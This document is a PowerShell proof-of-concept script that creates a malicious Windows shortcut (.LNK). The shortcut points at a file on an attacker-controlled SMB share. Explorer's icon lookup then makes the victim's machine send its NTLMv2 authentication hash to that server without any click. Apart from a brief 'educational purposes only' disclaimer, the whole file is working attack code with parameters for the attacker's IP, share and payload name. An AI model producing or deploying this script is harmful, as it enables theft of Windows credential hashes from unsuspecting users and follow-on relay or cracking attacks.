<# .SYNOPSIS Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure. This code is for educational and research purposes only. The author takes no responsibility for any misuse of this code. .DESCRIPTION This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file. The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to fetch the PE icon from the remote binary, triggering authentication. .PARAMETER path Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop). .PARAMETER ip IP address or hostname of the remote SMB server hosting the binary. .PARAMETER share The shared folder on the SMB server where the binary is stored. .PARAMETER file The name of the binary file (e.g., payload.exe). .EXAMPLE .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe" #> param( [Parameter(Mandatory=$true)] [string]$path, # -path [Parameter(Mandatory=$true)] [string]$ip, # -ip [Parameter(Mandatory=$true)] [string]$share, # -share [Parameter(Mandatory=$true)] [string]$file # -file ) # Build file paths $shortcutPath = Join-Path $path "poc.lnk" $targetPath = "\\$ip\$share\$file" $iconLocation = "C:\Windows\System32\SHELL32.dll" # Create LNK file $wShell = New-Object -ComObject WScript.Shell $shortcut = $wShell.CreateShortcut($shortcutPath) $shortcut.TargetPath = $targetPath $shortcut.IconLocation = $iconLocation $shortcut.Save() Write-Output "Shortcut created at: $shortcutPath" Write-Output "Target path: $targetPath"